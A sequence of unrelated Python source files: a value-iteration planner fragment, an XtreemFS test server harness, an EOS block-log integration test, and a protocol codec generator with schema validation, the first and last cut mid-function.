max_diff = max(abs(self.value_func[s] - max_q), max_diff)
# Update value.
self.value_func[s] = max_q
iterations += 1
value_of_init_state = self._compute_max_qval_action_pair(self.init_state)[0]
self.has_planned = True
return iterations, value_of_init_state
def run_vi_histories(self):
'''
Returns:
(tuple):
1. (int): num iterations taken.
2. (float): value.
3. (list of dict of state and float):
histories of the previous iterations.
Summary:
Runs ValueIteration and fills in the self.value_func and returns histories
'''
# Algorithm bookkeeping params.
iterations = 0
max_diff = float("inf")
self._compute_matrix_from_trans_func()
state_space = self.get_states()
self.bellman_backups = 0
histories = []
# Main loop.
while max_diff > self.delta and iterations < self.max_iterations:
max_diff = 0
for s in state_space:
self.bellman_backups += 1
if s.is_terminal():
continue
max_q = float("-inf")
for a in self.actions:
q_s_a = self.get_q_value(s, a)
if(q_s_a > max_q):
max_q = q_s_a
self.max_q_act_histories[s] = a
# Check terminating condition.
max_diff = max(abs(self.value_func[s] - max_q), max_diff)
# Update value.
self.value_func[s] = max_q
histories.append(copy.deepcopy(self.max_q_act_histories))
iterations += 1
value_of_init_state = self._compute_max_qval_action_pair(self.init_state)[0]
self.has_planned = True
return iterations, value_of_init_state, histories
def get_num_backups_in_recent_run(self):
if self.has_planned:
return self.bellman_backups
else:
print("Warning: asking for num Bellman backups, but VI has not been run.")
return 0
def print_value_func(self):
for key in self.value_func.keys():
print(key, ":", self.value_func[key])
def plan(self, state=None, horizon=50):
'''
Args:
state (State)
horizon (int)
Returns:
(list): List of actions
'''
state = self.mdp.get_init_state() if state is None else state
if self.has_planned is False:
print("Warning: VI has not been run. Plan will be random.")
action_seq = []
state_seq = [state]
steps = 0
while (not state.is_terminal()) and steps < horizon:
next_action = self._get_max_q_action(state)
action_seq.append(next_action)
state = self.transition_func(state, next_action)
state_seq.append(state)
steps += 1
return action_seq, state_seq
def _get_max_q_action(self, state):
'''
Args:
state (State)
Returns:
(str): The action with the max q value in the given @state.
'''
return self._compute_max_qval_action_pair(state)[1]
def get_max_q_actions(self, state):
'''
Args:
state (State)
Returns:
(list): List of actions with the max q value in the given @state.
'''
max_q_val = self.get_value(state)
best_action_list = []
# Find best action (action w/ current max predicted Q value)
for action in self.actions:
q_s_a = self.get_q_value(state, action)
if q_s_a == max_q_val:
best_action_list.append(action)
return best_action_list
def policy(self, state):
'''
Args:
state (State)
Returns:
(str): Action
Summary:
For use in a FixedPolicyAgent.
'''
return self._get_max_q_action(state)
def _compute_max_qval_action_pair(self, state):
'''
Args:
state (State)
Returns:
(tuple) --> (float, str): where the float is the Qval, str is the action.
'''
# Grab random initial action in case all equal
max_q_val = float("-inf")
best_action = self.actions[0]
# Find best action (action w/ current max predicted Q value)
for action in self.actions:
q_s_a = self.get_q_value(state, action)
if q_s_a > max_q_val:
max_q_val = q_s_a
best_action = action
return max_q_val, best_action
|
|
# Copyright (c) 2009-2011 by Minor Gordon, Bjoern Kolbeck, Zuse Institute Berlin
# Licensed under the BSD License, see LICENSE file for details.
from datetime import datetime
from time import sleep
import sys, os, subprocess, signal
class Server:
def __init__(self,
start_stop_retries,
config_file_path,
run_dir_path,
xtreemfs_dir,
data_dir,
rpc_port,
uuid,
storage_threads):
self._start_stop_retries = start_stop_retries
self._config_file_path = config_file_path
self._run_dir_path = run_dir_path
self._xtreemfs_dir = xtreemfs_dir
self._data_dir = data_dir
self._config = dict()
# Initialize with default values
self._config['listen.port'] = rpc_port
self._config['http_port'] = rpc_port - 2000
self._config['debug.level'] = 6
self._config['uuid'] = uuid
self._config['ssl.enabled'] = 'false'
self._config['storage_threads'] = storage_threads
def configure(self):
pass
# Nothing to do here.
def set_debug_level(self, debug_level):
self._config['debug.level'] = debug_level
def enable_ssl(self,
use_gridssl,
pkcs12_file_path,
pkcs12_passphrase,
trusted_certs_jks_file_path,
trusted_certs_jks_passphrase):
self._config['ssl.enabled'] = 'true'
if use_gridssl:
self._config['ssl.grid_ssl'] = 'true'
else:
self._config['ssl.grid_ssl'] = 'false'
self._config['ssl.service_creds'] = pkcs12_file_path
self._config['ssl.service_creds.pw'] = pkcs12_passphrase
self._config['ssl.service_creds.container'] = 'PKCS12'
self._config['ssl.trusted_certs'] = trusted_certs_jks_file_path
self._config['ssl.trusted_certs.pw'] = trusted_certs_jks_passphrase
self._config['ssl.trusted_certs.container'] = 'JKS'
# set configuration parameters required for SNMP support
def enable_snmp(self,
snmp_port,
snmp_address,
snmp_aclfile):
self._config['snmp.enabled'] = 'true'
self._config['snmp.port'] = snmp_port
self._config['snmp.address'] = snmp_address
self._config['snmp.aclfile'] = snmp_aclfile
# Imports the configuration from the config file.
def read_config_file(self):
self._config = dict()
for line in open(self._config_file_path).readlines():
line_parts = line.split( "=", 1 )
if len( line_parts ) == 2:
self._config[line_parts[0].strip()] = line_parts[1].strip()
# Writes the current configuration to a config file
def write_config_file(self):
text = "# autogenerated by test_server.py at "+str(datetime.now())+"\n"
for k in sorted(self._config.keys()):
text += str(k) + "=" + str(self._config[k]) + "\n"
f = open(self._config_file_path,'w')
f.write(text)
f.close()
def get_config_file_path(self):
return self._config_file_path
def _get_config_property(self, key):
return self._config[key]
def _get_pid_file_path(self):
return os.path.join(self._run_dir_path, self.get_uuid() + ".pid")
def get_http_port(self):
return int(self._config["http_port"])
def get_rpc_port(self):
return int(self._config["listen.port"])
def get_uuid(self):
return self._config["uuid"]
def getServiceUrl(self):
url = "pbrpc://"
if (self._config['ssl.enabled'] == 'true'):
if (self._config['ssl.grid_ssl'] == 'true'):
url = "pbrpcg://"
else:
url = "pbrpcs://"
url += "localhost:" + str(self._config["listen.port"]) + "/"
return url
def is_running(self):
pid_file_path = self._get_pid_file_path()
if os.path.exists(pid_file_path):
pid = open(pid_file_path).read().strip()
try:
pid = int(pid)
except ValueError:
return False
#print "xtestenv: checking if", self.__class__.__name__, "server is running with pid", pid
try:
pid, exitvalue = os.waitpid(int(pid), os.WNOHANG)
if pid != 0 and exitvalue != 0:
return False
else:
return True
except OSError:
return False
else:
return False
def save_status_page(self, to_file_path):
http_port = self.get_http_port()
os.system("wget -O %(to_file_path)s http://localhost:%(http_port)u" % locals())
def start(self,
log_file_path=None):
if sys.platform == "win32" or not self.is_running():
try: os.mkdir(self._run_dir_path)
except: pass
pid_file_path = self._get_pid_file_path()
java_args = [os.path.join(os.environ["JAVA_HOME"], "bin", "java")]
# Enable assertions.
java_args.append("-ea")
# Construct the -cp classpath
XtreemFS_jar_file_path = os.path.abspath(os.path.join(self._xtreemfs_dir, "java", "servers", "dist", "XtreemFS.jar"))
if os.path.exists(XtreemFS_jar_file_path):
classpath = (
XtreemFS_jar_file_path,
os.path.abspath(os.path.join(self._xtreemfs_dir, "java", "lib", "BabuDB.jar")),
os.path.abspath(os.path.join(self._xtreemfs_dir, "java", "lib", "protobuf-java-2.5.0.jar")),
os.path.abspath(os.path.join(self._xtreemfs_dir, "java", "flease", "dist", "Flease.jar")),
os.path.abspath(os.path.join(self._xtreemfs_dir, "java", "foundation", "dist", "Foundation.jar")),
os.path.abspath(os.path.join(self._xtreemfs_dir, "java", "lib", "jdmkrt.jar")),
os.path.abspath(os.path.join(self._xtreemfs_dir, "java", "lib", "commons-codec-1.3.jar")),
)
else:
classpath = (
os.path.join("/usr/share/java", "XtreemFS.jar"),
os.path.join("/usr/share/java", "BabuDB.jar"),
os.path.join("/usr/share/java", "protobuf-java-2.5.0.jar"),
os.path.join("/usr/share/java", "Flease.jar"),
os.path.join("/usr/share/java", "Foundation.jar"),
os.path.join("/usr/share/java", "jdmkrt.jar"),
os.path.join("/usr/share/java", "commons-codec-1.3.jar"),
)
if sys.platform.startswith("win"):
classpath = ";".join(classpath)
else:
classpath = ":".join(classpath)
java_args.extend(("-cp", classpath))
# Name of the class to start
java_args.append("org.xtreemfs." + self.__class__.__name__.lower() + "." + self.__class__.__name__.upper())
# .config file
java_args.append(self.get_config_file_path())
# Don't .join java_args, since Popen wants a sequence when shell=False
if log_file_path is None:
stderr = sys.stderr
stdout = sys.stdout
else:
# Redirect stderr and stdout to a log file
stderr = stdout = open(log_file_path, "a")
#print "xctl: starting", self.__class__.__name__, "server with UUID", self.get_uuid(), "on port", self.get_rpc_port(), "with", " ".join(java_args)
p = subprocess.Popen(java_args, stdout=stdout, stderr=stderr) # No shell=True: we only want one process (java), not two (/bin/sh and java)
if p.returncode is not None:
raise RuntimeError(self.get_uuid() + " failed to start: " + str(p.returncode))
pidfile = open(pid_file_path, "w+")
pidfile.write(str(p.pid))
pidfile.close()
print "xtestenv: started", self.__class__.__name__, "server with UUID", self.get_uuid(), "on port", self.get_rpc_port(), "with pid", p.pid
sleep(1.0)
if not self.is_running():
raise RuntimeError, self.get_uuid() + " failed to start"
else:
print "xtestenv:", self.__class__.__name__, "server with UUID", self.get_uuid(), "is already running"
def stop(self):
pid_file_path = self._get_pid_file_path()
if os.path.exists(pid_file_path):
pid = int(open(pid_file_path).read().strip())
if sys.platform.startswith("win"):
subprocess.call("TASKKILL /PID %(pid)u /F /T" % locals())
killed = True
else:
killed = False
for signo in (signal.SIGTERM, signal.SIGKILL):
for try_i in xrange(self._start_stop_retries):
print "xtestenv: stopping", self.__class__.__name__, "server with pid", pid, "with signal", str(signo) + ", try", try_i
try: os.kill(pid, signo)
except: pass
sleep(0.5)
try:
if os.waitpid(pid, os.WNOHANG)[0] != 0:
killed = True
break
except OSError:
killed = True
break
except:
if DEBUG_ME:
traceback.print_exc()
if killed:
break
if killed:
os.unlink(pid_file_path)
else:
print "xtestenv: no pid file for", self.__class__.__name__, "server"
class DIR(Server):
def configure(self):
try: os.mkdir(self._data_dir)
except: pass
self._config['babudb.debug.level'] = self._config['debug.level']
self._config['babudb.logDir'] = self._data_dir
self._config['babudb.baseDir'] = self._data_dir
self._config['babudb.sync'] = 'FSYNC'
self._config['babudb.worker.maxQueueLength'] = '250'
self._config['babudb.worker.numThreads'] = '0'
self._config['babudb.maxLogfileSize'] = '16777216'
self._config['babudb.checkInterval'] = '300'
self._config['babudb.pseudoSyncWait'] = '200'
self._config['database.dir'] = self._data_dir
self._config['database.log'] = self._data_dir
self._config['authentication_provider'] = 'org.xtreemfs.common.auth.NullAuthProvider'
class MRC(Server):
def configure(self,
dir_host,
dir_port):
try: os.mkdir(self._data_dir)
except: pass
self._config['dir_service.host'] = dir_host
self._config['dir_service.port'] = dir_port
self._config['osd_check_interval'] = 300
self._config['no_atime'] = 'true'
self._config['no_fsync'] = 'true'
self._config['local_clock_renewal'] = 0
self._config['remote_time_sync'] = 60000
self._config['capability_secret'] = 'testsecret'
self._config['database.checkpoint.interval'] = 1800000
self._config['database.checkpoint.idle_interval'] = 1000
self._config['database.checkpoint.logfile_size'] = 16384
self._config['babudb.debug.level'] = self._config['debug.level']
self._config['babudb.logDir'] = self._data_dir
self._config['babudb.baseDir'] = self._data_dir
self._config['babudb.sync'] = 'ASYNC'
self._config['babudb.worker.maxQueueLength'] = '250'
self._config['babudb.worker.numThreads'] = '0'
self._config['babudb.maxLogfileSize'] = '16777216'
self._config['babudb.checkInterval'] = '300'
self._config['babudb.pseudoSyncWait'] = '0'
self._config['database.dir'] = self._data_dir
self._config['database.log'] = self._data_dir
self._config['authentication_provider'] = 'org.xtreemfs.common.auth.NullAuthProvider'
class OSD(Server):
def configure(self,
dir_host,
dir_port):
try: os.mkdir(self._data_dir)
except: pass
self._config['dir_service.host'] = dir_host
self._config['dir_service.port'] = dir_port
self._config['local_clock_renewal'] = 0
self._config['remote_time_sync'] = 60000
self._config['capability_secret'] = 'testsecret'
self._config['report_free_space'] = 'true'
self._config['checksums.enabled'] = 'false'
self._config['object_dir'] = self._data_dir
# Some tests overload the test system, increase timeouts.
self._config['flease.lease_timeout_ms'] = 60000
self._config['flease.message_to_ms'] = 2000
|
|
#!/usr/bin/env python3
from testUtils import Utils
from testUtils import BlockLogAction
import time
from Cluster import Cluster
from WalletMgr import WalletMgr
from Node import BlockType
import os
import signal
import subprocess
from TestHelper import AppArgs
from TestHelper import TestHelper
###############################################################
# block_log_util_test
# Test verifies that the blockLogUtil is still compatible with nodeos
###############################################################
Print=Utils.Print
errorExit=Utils.errorExit
from core_symbol import CORE_SYMBOL
def verifyBlockLog(expected_block_num, trimmedBlockLog):
firstBlockNum = expected_block_num
for block in trimmedBlockLog:
assert 'block_num' in block, print("ERROR: eosio-blocklog didn't return block output")
block_num = block['block_num']
assert block_num == expected_block_num
expected_block_num += 1
Print("Block_log contiguous from block number %d to %d" % (firstBlockNum, expected_block_num - 1))
appArgs=AppArgs()
args = TestHelper.parse_args({"--dump-error-details","--keep-logs","-v","--leave-running","--clean-run"})
Utils.Debug=args.v
pnodes=2
cluster=Cluster(walletd=True)
dumpErrorDetails=args.dump_error_details
keepLogs=args.keep_logs
dontKill=args.leave_running
prodCount=2
killAll=args.clean_run
walletPort=TestHelper.DEFAULT_WALLET_PORT
totalNodes=pnodes+1
walletMgr=WalletMgr(True, port=walletPort)
testSuccessful=False
killEosInstances=not dontKill
killWallet=not dontKill
WalletdName=Utils.EosWalletName
ClientName="cleos"
try:
TestHelper.printSystemInfo("BEGIN")
cluster.setWalletMgr(walletMgr)
cluster.killall(allInstances=killAll)
cluster.cleanup()
Print("Stand up cluster")
if cluster.launch(prodCount=prodCount, onlyBios=False, pnodes=pnodes, totalNodes=totalNodes, totalProducers=pnodes*prodCount, useBiosBootFile=False) is False:
Utils.errorExit("Failed to stand up eos cluster.")
Print("Validating system accounts after bootstrap")
cluster.validateAccounts(None)
biosNode=cluster.biosNode
node0=cluster.getNode(0)
node1=cluster.getNode(1)
blockNum=100
Print("Wait till we at least get to block %d" % (blockNum))
node0.waitForBlock(blockNum, blockType=BlockType.lib)
info=node0.getInfo(exitOnError=True)
headBlockNum=info["head_block_num"]
lib=info["last_irreversible_block_num"]
Print("Kill the node we want to verify its block log")
node0.kill(signal.SIGTERM)
Print("Wait for node0's head block to become irreversible")
node1.waitForBlock(headBlockNum, blockType=BlockType.lib)
infoAfter=node1.getInfo(exitOnError=True)
headBlockNumAfter=infoAfter["head_block_num"]
def checkBlockLog(blockLog, blockNumsToFind, firstBlockNum=1):
foundBlockNums=[]
nextBlockNum=firstBlockNum
previous=0
nextIndex=0
for block in blockLog:
blockNum=block["block_num"]
if nextBlockNum!=blockNum:
Utils.errorExit("BlockLog should progress to the next block number, expected block number %d but got %d" % (nextBlockNum, blockNum))
if nextIndex<len(blockNumsToFind) and blockNum==blockNumsToFind[nextIndex]:
foundBlockNums.append(True)
nextIndex+=1
nextBlockNum+=1
while nextIndex<len(blockNumsToFind):
foundBlockNums.append(False)
if nextIndex<len(blockNumsToFind)-1:
assert blockNumsToFind[nextIndex+1] > blockNumsToFind[nextIndex], "expects passed in array, blockNumsToFind to increase from smallest to largest, %d is less than or equal to %d" % (next, previous)
nextIndex+=1
return foundBlockNums
Print("Retrieve the whole blocklog for node 0")
blockLog=cluster.getBlockLog(0)
foundBlockNums=checkBlockLog(blockLog, [headBlockNum, headBlockNumAfter])
assert foundBlockNums[0], "Couldn't find \"%d\" in blocklog:\n\"%s\"\n" % (foundBlockNums[0], output)
assert not foundBlockNums[1], "Should not find \"%d\" in blocklog:\n\"%s\"\n" % (foundBlockNums[1], blockLog)
output=cluster.getBlockLog(0, blockLogAction=BlockLogAction.smoke_test)
expectedStr="no problems found"
assert output.find(expectedStr) != -1, "Couldn't find \"%s\" in:\n\"%s\"\n" % (expectedStr, output)
blockLogDir=Utils.getNodeDataDir(0, "blocks")
duplicateIndexFileName=os.path.join(blockLogDir, "duplicate.index")
output=cluster.getBlockLog(0, blockLogAction=BlockLogAction.make_index, outputFile=duplicateIndexFileName)
assert output is not None, "Couldn't make new index file \"%s\"\n" % (duplicateIndexFileName)
blockIndexFileName=os.path.join(blockLogDir, "blocks.index")
blockIndexFile=open(blockIndexFileName,"rb")
duplicateIndexFile=open(duplicateIndexFileName,"rb")
blockIndexStr=blockIndexFile.read()
duplicateIndexStr=duplicateIndexFile.read()
assert blockIndexStr==duplicateIndexStr, "Generated file \%%s\" didn't match original \"%s\"" % (duplicateIndexFileName, blockIndexFileName)
try:
Print("Head block num %d will not be in block log (it will be in reversible DB), so --trim will throw an exception" % (headBlockNum))
output=cluster.getBlockLog(0, blockLogAction=BlockLogAction.trim, last=headBlockNum, throwException=True)
Utils.errorExit("BlockLogUtil --trim should have indicated error for last value set to lib (%d) " +
"which should not do anything since only trimming blocklog and not irreversible blocks" % (lib))
except subprocess.CalledProcessError as ex:
pass
beforeEndOfBlockLog=lib-20
Print("Block num %d will definitely be at least one block behind the most recent entry in block log, so --trim will work" % (beforeEndOfBlockLog))
output=cluster.getBlockLog(0, blockLogAction=BlockLogAction.trim, last=beforeEndOfBlockLog, throwException=True)
Print("Kill the non production node, we want to verify its block log")
cluster.getNode(2).kill(signal.SIGTERM)
Print("Trim off block num 1 to remove genesis block from block log.")
output=cluster.getBlockLog(2, blockLogAction=BlockLogAction.trim, first=2, throwException=True)
Print("Smoke test the trimmed block log.")
output=cluster.getBlockLog(2, blockLogAction=BlockLogAction.smoke_test)
Print("Analyze block log.")
trimmedBlockLog=cluster.getBlockLog(2, blockLogAction=BlockLogAction.return_blocks)
verifyBlockLog(2, trimmedBlockLog)
# relaunch the node with the truncated block log and ensure it catches back up with the producers
current_head_block_num = node1.getInfo()["head_block_num"]
cluster.getNode(2).relaunch(cachePopen=True)
assert cluster.getNode(2).waitForBlock(current_head_block_num, timeout=60, reportInterval=15)
# ensure it continues to advance
current_head_block_num = node1.getInfo()["head_block_num"]
assert cluster.getNode(2).waitForBlock(current_head_block_num, timeout=60, reportInterval=15)
info = cluster.getNode(2).getInfo()
block = cluster.getNode(2).getBlock(2)
assert block is not None
block = cluster.getNode(2).getBlock(1, silentErrors=True)
assert block is None
# verify it shuts down cleanly
cluster.getNode(2).interruptAndVerifyExitStatus()
firstBlock = info["last_irreversible_block_num"]
Print("Trim off block num %s." % (firstBlock))
output=cluster.getBlockLog(2, blockLogAction=BlockLogAction.trim, first=firstBlock, throwException=True)
Print("Smoke test the trimmed block log.")
output=cluster.getBlockLog(2, blockLogAction=BlockLogAction.smoke_test)
Print("Analyze block log.")
trimmedBlockLog=cluster.getBlockLog(2, blockLogAction=BlockLogAction.return_blocks)
verifyBlockLog(firstBlock, trimmedBlockLog)
# relaunch the node with the truncated block log and ensure it catches back up with the producers
current_head_block_num = node1.getInfo()["head_block_num"]
assert current_head_block_num >= info["head_block_num"]
cluster.getNode(2).relaunch(cachePopen=True)
assert cluster.getNode(2).waitForBlock(current_head_block_num, timeout=60, reportInterval=15)
# ensure it continues to advance
current_head_block_num = node1.getInfo()["head_block_num"]
assert cluster.getNode(2).waitForBlock(current_head_block_num, timeout=60, reportInterval=15)
info = cluster.getNode(2).getInfo()
block = cluster.getNode(2).getBlock(firstBlock)
assert block is not None
block = cluster.getNode(2).getBlock(firstBlock - 1, silentErrors=True)
assert block is None
block = cluster.getNode(2).getBlock(1, silentErrors=True)
assert block is None
# verify it shuts down cleanly
cluster.getNode(2).interruptAndVerifyExitStatus()
# test for blocks.log
blockLogFileName=os.path.join(blockLogDir, "blocks.log")
blockIndexFileSize = os.path.getsize(blockIndexFileName)
blockLogFileSize = os.path.getsize(blockLogFileName)
blockLogFile = open(blockLogFileName, 'a')
# truncate blocks.log by 1 byte
blockLogFile.truncate(blockLogFileSize - 1)
blockLogFile.close()
truncatedBlockLogFileSize = os.path.getsize(blockLogFileName)
assert truncatedBlockLogFileSize == blockLogFileSize - 1, "blocks.log not truncated properly\n"
# fix_irreversible_blocks
output=cluster.getBlockLog(0, blockLogAction=BlockLogAction.fix_irreversible_blocks)
output=cluster.getBlockLog(0, blockLogAction=BlockLogAction.smoke_test)
expectedStr="no problems found"
assert output.find(expectedStr) != -1, "Couldn't find \"%s\" in:\n\"%s\"\n" % (expectedStr, output)
testSuccessful=True
finally:
TestHelper.shutdown(cluster, walletMgr, testSuccessful=testSuccessful, killEosInstances=killEosInstances, killWallet=killWallet, keepLogs=keepLogs, cleanRun=killAll, dumpErrorDetails=dumpErrorDetails)
exit(0)
|
|
import hashlib
import json
import re
from enum import Enum
from os import listdir, makedirs
from os.path import dirname, isfile, join, realpath
import jsonschema
import yaml
from jinja2 import Environment, PackageLoader
from yaml import MarkedYAMLError
from binary import FixedEntryListTypes, FixedLengthTypes, FixedListTypes, FixedMapTypes
from cpp import cpp_ignore_service_list, cpp_types_decode, cpp_types_encode, get_size, is_trivial
from cs import cs_escape_keyword, cs_ignore_service_list, cs_types_decode, cs_types_encode
from java import java_types_decode, java_types_encode
from md import internal_services
from py import (
py_escape_keyword,
py_get_import_path_holders,
py_ignore_service_list,
py_param_name,
py_types_encode_decode,
)
from ts import (
ts_escape_keyword,
ts_get_import_path_holders,
ts_ignore_service_list,
ts_types_decode,
ts_types_encode,
)
MAJOR_VERSION_MULTIPLIER = 10000
MINOR_VERSION_MULTIPLIER = 100
PATCH_VERSION_MULTIPLIER = 1
def java_name(type_name):
return "".join([capital(part) for part in type_name.split("_")])
def cs_name(type_name):
return "".join(
[capital(part) for part in type_name.replace("(", "").replace(")", "").split("_")]
)
def cpp_name(type_name):
return "".join(
[capital(part) for part in type_name.replace("(", "").replace(")", "").split("_")]
)
def param_name(type_name):
return type_name[0].lower() + type_name[1:]
def is_fixed_type(param):
return param["type"] in FixedLengthTypes
def capital(txt):
return txt[0].capitalize() + txt[1:]
def to_upper_snake_case(camel_case_str):
return re.sub("((?<=[a-z0-9])[A-Z]|(?!^)[A-Z](?=[a-z]))", r"_\1", camel_case_str).upper()
# s1 = re.sub('(.)([A-Z]+[a-z]+)', r'\1_\2', camel_case_str)
# return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).upper()
def version_to_number(major, minor, patch=0):
return (
MAJOR_VERSION_MULTIPLIER * major
+ MINOR_VERSION_MULTIPLIER * minor
+ PATCH_VERSION_MULTIPLIER * patch
)
def get_version_as_number(version):
if not isinstance(version, str):
version = str(version)
return version_to_number(*map(int, version.split(".")))
def fixed_params(params):
return [p for p in params if is_fixed_type(p)]
def var_size_params(params):
return [p for p in params if not is_fixed_type(p)]
def new_params(since, params):
"""
Returns the list of parameters that are added later than given version.
Because the method should precede all the parameters that are added
latter, a simple equality check between the versions that the method and
the parameter is added is enough.
"""
return [p for p in params if p["since"] != since]
def filter_new_params(params, version):
"""
Returns the filtered list of parameters such that,
the resulting list contains only the ones that are added
before or at the same time with the given version.
"""
version_as_number = get_version_as_number(version)
return [p for p in params if version_as_number >= get_version_as_number(p["since"])]
def generate_codecs(services, template, output_dir, lang, env):
makedirs(output_dir, exist_ok=True)
id_fmt = "0x%02x%02x%02x"
if lang is SupportedLanguages.CPP:
curr_dir = dirname(realpath(__file__))
cpp_dir = "%s/cpp" % curr_dir
f = open(join(cpp_dir, "header_includes.txt"), "r")
save_file(join(output_dir, "codecs.h"), f.read(), "w")
f = open(join(cpp_dir, "source_header.txt"), "r")
save_file(join(output_dir, "codecs.cpp"), f.read(), "w")
for service in services:
if service["name"] in language_service_ignore_list[lang]:
print("[%s] is in ignore list so ignoring it." % service["name"])
continue
if "methods" in service:
methods = service["methods"]
if methods is None:
raise NotImplementedError("Methods not found for service " + service)
for method in service["methods"]:
if (service["name"] + "." + method["name"]) in language_service_ignore_list[lang]:
print(
"[%s] is in ignore list so ignoring it."
% (service["name"] + "." + method["name"])
)
continue
method["request"]["id"] = int(id_fmt % (service["id"], method["id"], 0), 16)
method["response"]["id"] = int(id_fmt % (service["id"], method["id"], 1), 16)
events = method.get("events", None)
if events is not None:
for i in range(len(events)):
method["events"][i]["id"] = int(
id_fmt % (service["id"], method["id"], i + 2), 16
)
codec_file_name = file_name_generators[lang](service["name"], method["name"])
try:
if lang is SupportedLanguages.CPP:
codec_template = env.get_template("codec-template.h.j2")
content = codec_template.render(service_name=service["name"], method=method)
save_file(join(output_dir, "codecs.h"), content, "a+")
codec_template = env.get_template("codec-template.cpp.j2")
content = codec_template.render(service_name=service["name"], method=method)
save_file(join(output_dir, "codecs.cpp"), content, "a+")
else:
content = template.render(service_name=service["name"], method=method)
save_file(join(output_dir, codec_file_name), content)
except NotImplementedError:
print("[%s] contains missing type mapping so ignoring it." % codec_file_name)
if lang is SupportedLanguages.CPP:
f = open(join(cpp_dir, "footer.txt"), "r")
content = f.read()
save_file(join(output_dir, "codecs.h"), content, "a+")
save_file(join(output_dir, "codecs.cpp"), content, "a+")
def generate_custom_codecs(services, template, output_dir, lang, env):
makedirs(output_dir, exist_ok=True)
if lang == SupportedLanguages.CPP:
cpp_header_template = env.get_template("custom-codec-template.h.j2")
cpp_source_template = env.get_template("custom-codec-template.cpp.j2")
for service in services:
if "customTypes" in service:
custom_types = service["customTypes"]
for codec in custom_types:
try:
if lang == SupportedLanguages.CPP:
file_name_prefix = codec["name"].lower() + "_codec"
header_file_name = file_name_prefix + ".h"
source_file_name = file_name_prefix + ".cpp"
codec_file_name = header_file_name
content = cpp_header_template.render(codec=codec)
save_file(join(output_dir, header_file_name), content)
codec_file_name = source_file_name
content = cpp_source_template.render(codec=codec)
save_file(join(output_dir, source_file_name), content)
else:
codec_file_name = file_name_generators[lang](codec["name"])
content = template.render(codec=codec)
save_file(join(output_dir, codec_file_name), content)
except NotImplementedError:
print("[%s] contains missing type mapping so ignoring it." % codec_file_name)
def generate_documentation(services, custom_definitions, template, output_dir):
makedirs(output_dir, exist_ok=True)
content = template.render(
services=list(filter(lambda s: s["name"] not in internal_services, services)),
custom_definitions=custom_definitions,
)
file_name = join(output_dir, "documentation.md")
with open(file_name, "w", newline="\n") as file:
file.writelines(content)
def item_type(lang_name, param_type):
if param_type.startswith("List_") or param_type.startswith("ListCN_"):
return lang_name(param_type.split("_", 1)[1])
def key_type(lang_name, param_type):
return lang_name(param_type.split("_", 2)[1])
def value_type(lang_name, param_type):
return lang_name(param_type.split("_", 2)[2])
def is_var_sized_list(param_type):
return param_type.startswith("List_") and param_type not in FixedListTypes
def is_var_sized_list_contains_nullable(param_type):
return param_type.startswith("ListCN_") and param_type not in FixedListTypes
def is_var_sized_map(param_type):
return param_type.startswith("Map_") and param_type not in FixedMapTypes
def is_var_sized_entry_list(param_type):
return param_type.startswith("EntryList_") and param_type not in FixedEntryListTypes
def load_services(protocol_def_dir):
service_list = listdir(protocol_def_dir)
services = []
for service_file in service_list:
file_path = join(protocol_def_dir, service_file)
if isfile(file_path):
with open(file_path, "r") as file:
try:
data = yaml.load(file, Loader=yaml.Loader)
except MarkedYAMLError as err:
print(err)
exit(-1)
services.append(data)
return services
def validate_services(services, schema_path, no_id_check, protocol_versions):
valid = True
with open(schema_path, "r") as schema_file:
schema = json.load(schema_file)
for i in range(len(services)):
service = services[i]
if not validate_against_schema(service, schema):
return False
if not no_id_check:
# Validate id ordering of services.
service_id = service["id"]
if i != service_id:
print(
"Check the service id of the %s. Expected: %s, found: %s."
% (service["name"], i, service_id)
)
valid = False
# Validate id ordering of definition methods.
methods = service["methods"]
for j in range(len(methods)):
method = methods[j]
method_id = method["id"]
if (j + 1) != method_id:
print(
"Check the method id of %s#%s. Expected: %s, found: %s"
% (service["name"], method["name"], (j + 1), method_id)
)
valid = False
request_params = method["request"].get("params", [])
method_name = service["name"] + "#" + method["name"]
if not is_parameters_ordered_and_semantically_correct(
method["since"], method_name + "#request", request_params, protocol_versions
):
valid = False
response_params = method["response"].get("params", [])
if not is_parameters_ordered_and_semantically_correct(
method["since"],
method_name + "#response",
response_params,
protocol_versions,
):
valid = False
events = method.get("events", [])
for event in events:
event_params = event.get("params", [])
if not is_parameters_ordered_and_semantically_correct(
event["since"],
method_name + "#" + event["name"] + "#event",
event_params,
protocol_versions,
):
valid = False
return valid
def is_semantically_correct_param(version, protocol_versions):
is_semantically_correct = True
if version != protocol_versions[0]:
# Not 2.0
if version % MINOR_VERSION_MULTIPLIER == 0:
# Minor version
if (version - MINOR_VERSION_MULTIPLIER) not in protocol_versions:
# since is set to 2.x but 2.(x-1) is not in the protocol definitions
is_semantically_correct = False
elif version % PATCH_VERSION_MULTIPLIER == 0:
# Patch version
if (version - PATCH_VERSION_MULTIPLIER) not in protocol_versions:
# since is set to 2.x.y but 2.x.(y-1) is not in the protocol definitions
is_semantically_correct = False
return is_semantically_correct
def is_parameters_ordered_and_semantically_correct(since, name, params, protocol_versions):
is_ordered = True
is_semantically_correct = True
version = get_version_as_number(since)
if not is_semantically_correct_param(version, protocol_versions):
method_or_event_name = name[: name.rindex("#")]
print(
'Check the since value of the "%s"\n'
'It is set to version "%s" but this protocol version does '
"not semantically follow other protocol versions!" % (method_or_event_name, since)
)
is_semantically_correct = False
for param in params:
param_version = get_version_as_number(param["since"])
if not is_semantically_correct_param(param_version, protocol_versions):
print(
'Check the since value of "%s" field of the "%s".\n'
'It is set version "%s" but this protocol version does '
"not semantically follow other protocol versions!"
% (param["name"], name, param["since"])
)
is_semantically_correct = False
if version > param_version:
print(
'Check the since value of "%s" field of the "%s".\n'
"Parameters should be in the increasing order of since values!"
% (param["name"], name)
)
is_ordered = False
version = param_version
return is_ordered and is_semantically_correct
def validate_custom_protocol_definitions(definition, schema_path, protocol_versions):
valid = True
with open(schema_path, "r") as schema_file:
schema = json.load(schema_file)
custom_types = definition[0]
if not validate_against_schema(custom_types, schema):
return False
for custom_type in custom_types["customTypes"]:
params = custom_type.get("params", [])
if not is_parameters_ordered_and_semantically_correct(
custom_type["since"], "CustomTypes#" + custom_type["name"], params, protocol_versions
):
valid = False
return valid
def validate_against_schema(service, schema):
try:
jsonschema.validate(service, schema)
except jsonschema.ValidationError as e:
print("Validation error on %s: %s" % (service.get("name", None), e))
return False
return True
def save_file(file, content, mode="w"):
m = hashlib.md5()
m.update(content.encode("utf-8"))
codec_hash = m.hexdigest()
